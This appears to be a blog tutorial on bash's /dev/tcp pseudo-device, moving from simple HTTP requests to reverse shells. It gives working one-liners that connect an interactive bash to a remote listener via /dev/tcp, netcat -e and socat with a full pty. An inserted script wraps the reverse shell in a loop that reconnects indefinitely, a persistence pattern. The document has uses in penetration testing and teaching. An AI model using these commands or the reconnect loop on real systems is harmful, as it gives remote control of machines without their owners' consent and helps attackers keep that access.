Reverse shells are fun
Need SSH access, but something is going wrong? Read on!
Sometimes I need a shell right now, but in some cases it's impossible (no SSH on the hosting, or something like that).
Happily, bash has built-in network pseudo-devices, /dev/tcp and /dev/udp (enabled by default in most distros' bash builds). They are handled by bash itself, not by the kernel, so they only work inside bash redirections. This means that whenever we can run a command on the server (through PHP, Ruby or anything else that can spawn bash), we can make bash open a reverse connection to a listener and get shell access.
To use them, we redirect input from or output to /dev/tcp/host/port, just like a file. For example, reading from the daytime service on port 13:
user@host ~ $ cat < /dev/tcp/time.nist.gov/13
57103 15-03-22 23:54:14 50 0 0 587.5 UTC(NIST) *
Sending an HTTP request:
user@host ~ $ exec 3<> /dev/tcp/roundside.com/80
user@host ~ $ echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3
user@host ~ $ cat <&3
HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Mon, 23 Mar 2015 00:06:00 GMT
Content-Type: text/html
Content-Length: 11517
Connection: close
Last-Modified: Tue, 09 Dec 2014 17:40:10 GMT
ETag: "6587d2-2cfd-509cc08e7aef5"
Accept-Ranges: bytes
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "...
This is a little different from the previous one. As we need to send data first, we create file descriptor 3 for reading and writing and bind it to /dev/tcp/address/port:
exec 3<> /dev/tcp/roundside.com/80
A beautiful article about bash redirections is here.
Next, build the HTTP request headers and write them to file descriptor 3, which sends them:
echo -e "GET / HTTP/1.1\nHost: roundside.com\nConnection: close\n\n" >&3
And finally, read the response from the same descriptor (cat <&3).
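The same exchange as a small reusable script, added here as an example (it is not code from the original post). It sends proper CRLF line endings, fails cleanly instead of hanging when the connection is refused, and closes the descriptor afterwards. The function names are my own choice, and the status-line parser is shown on a constructed response rather than a live one:

```bash
#!/usr/bin/env bash
# Added example, not from the original post: a minimal HTTP GET client using
# nothing but bash's /dev/tcp. Function names are my own choice.

# HTTP/1.1 lines must end in CRLF. The post's echo -e "...\n" form works
# against lenient servers such as the nginx above, but it is not valid HTTP.
build_http_request() {
    local host=$1 path=${2:-/}
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host"
}

# Extract the status code (e.g. "200") from a raw response read on stdin.
# The first line looks like "HTTP/1.1 200 OK\r\n"; the CR must be stripped.
http_status_code() {
    head -n 1 | tr -d '\r' | cut -d ' ' -f 2
}

# Open host:port on fd 3, send the request, stream the response to stdout,
# then close fd 3. Returns 1 if the connection fails.
http_get() {
    local host=$1 port=${2:-80} path=${3:-/}
    # exec must run in the current shell so fd 3 survives. The brace group
    # limits the 2>/dev/null to this one command: a bare "exec ... 2>/dev/null"
    # would redirect the whole shell's stderr permanently.
    # Run this with bash: dash (a POSIX sh) treats a failed exec redirection
    # as fatal and exits the script.
    { exec 3<>"/dev/tcp/$host/$port"; } 2>/dev/null || return 1
    build_http_request "$host" "$path" >&3
    cat <&3          # Connection: close makes the server end the stream
    exec 3>&-        # always release the descriptor
}

# Usage (needs network):
#   http_get roundside.com 80 / | http_status_code
```

Piping http_get into http_status_code gives just the code, which is handy when /dev/tcp is the only HTTP client you have on a box (no curl, no wget).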
Now, let's get a bash over TCP
/dev/tcp can only make outbound connections (bash cannot listen on it), so netcat or socat is needed on the listener side. Create a listener (this is the traditional netcat syntax; the OpenBSD netcat shipped by many distros takes the port without -p):
user@listener ~: nc -l -p 1413
And connect to it from the target (the outer /bin/bash -c wrapper matters when the command is launched by something other than bash, such as /bin/sh from a PHP system() call, because /dev/tcp is a bash feature and not a real device):
user@target ~ $ /bin/bash -c "/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1"
Done: now we have a remote shell using nothing but bash on the target.
user@listener ~: nc -l -p 1413
user@target ~ $
In this example bash runs in interactive mode (bash -i sources ~/.bashrc or the default bash config file, so we get a slightly nicer shell with a prompt; without a tty it will also warn that there is no job control) and sends all of its stdout to the listener,
/bin/bash -i > /dev/tcp/listener_address/1413
and everything the listener sends becomes bash's stdin (0>&1) and gets executed, with the output going back to the listener. stderr is also redirected (2>&1); this is important, otherwise error messages stay on the target and a failing command shows nothing on our side:
/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1
/bin/bash -c "bash -i &> /dev/tcp/listener_address/1413 0>&1"
&> or >& (a bash extension) redirects both stdout and stderr to the given target. In either form the order matters: redirections are applied left to right, so 0>&1 must come after the one that put the socket on fd 1.
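As an added example (not from the original post), here is the same /dev/tcp reverse shell wrapped in a reconnect loop for the target side, so it keeps trying until the listener is up and comes back if the session drops. listener_address and port 1413 are the post's placeholders; tcp_open, connect_back and reverse_shell_loop are names I chose:

```bash
#!/usr/bin/env bash
# Added example, not from the original post: the /dev/tcp reverse shell above
# wrapped in a reconnect loop for the target side. listener_address and 1413
# are the post's placeholders; the function names are my own.

# Can we reach host:port? The exec runs in a subshell, so a refused
# connection only fails the subshell instead of aborting the calling script.
tcp_open() {
    ( exec 3<>"/dev/tcp/$1/$2" ) 2>/dev/null
}

# Attach an interactive bash to the socket. Redirections apply left to right:
#   >/dev/tcp/...  puts the socket on fd 1 (stdout)
#   0>&1           then makes stdin a copy of it (listener input -> bash)
#   2>&1           and stderr too, so error output reaches the listener
connect_back() {
    bash -i >"/dev/tcp/$1/$2" 0>&1 2>&1
}

# Retry until the listener is up, and reconnect when the session drops.
# max=0 means retry forever; returns 1 once max attempts are exhausted.
reverse_shell_loop() {
    local host=$1 port=$2 delay=${3:-5} max=${4:-0} n=0
    while :; do
        if tcp_open "$host" "$port"; then
            connect_back "$host" "$port"
        fi
        n=$((n + 1))
        if [ "$max" -gt 0 ] && [ "$n" -ge "$max" ]; then
            return 1
        fi
        sleep "$delay"
    done
}

# Target side (listener: nc -l -p 1413, or the socat command from the post):
#   reverse_shell_loop listener_address 1413
```

The probe in tcp_open is the same redirection the shell itself uses, so it tells you exactly whether bash on this box can reach the listener; it is also a cheap way to tell a "no /dev/tcp support compiled in" bash from a blocked port, because in the first case every host and port fails.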
Sure, netcat with the -e parameter can be used to execute bash (only in builds that have it, such as nc.traditional or ncat; the OpenBSD netcat deliberately omits -e):
user@target ~ $ nc listener_address 1413 -e '/bin/bash'
But there is a problem. There is no tty, so key shortcuts (a Ctrl-C on the listener kills the local netcat and the whole session with it), tab completion and ncurses-based programs will not work correctly. We need real tty access now, and it's socat time!
Socat is like netcat, but with extremely powerful features (statically linked binaries may be downloaded from here for Linux or here for FreeBSD).
Create a listener (raw,echo=0 switches your local terminal to raw mode, so keystrokes such as Ctrl-C are passed through to the remote pty instead of being interpreted locally):
user@listener ~: socat -,raw,echo=0 tcp-listen:1413
And connect from the target (pty gives bash a real pseudo-terminal, setsid makes it a session leader so the pty becomes its controlling terminal, stderr sends stderr over the pty too, sigint forwards SIGINT to bash and sane applies sensible terminal settings):
user@target ~ $ socat tcp:listener_address:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane
Now we can play ninvaders, use htop, mc, vim and any other CLI stuff :)
PS: don't forget to adjust the terminal size after getting the reverse bash. Check the size of your local terminal:
echo $LINES,$COLUMNS
53,159
and export the same values on the target after getting the shell (with socat's pty you can also apply them at the terminal level with stty rows/cols):
export LINES=53;export COLUMNS=159
All for now.
Socat man and examples page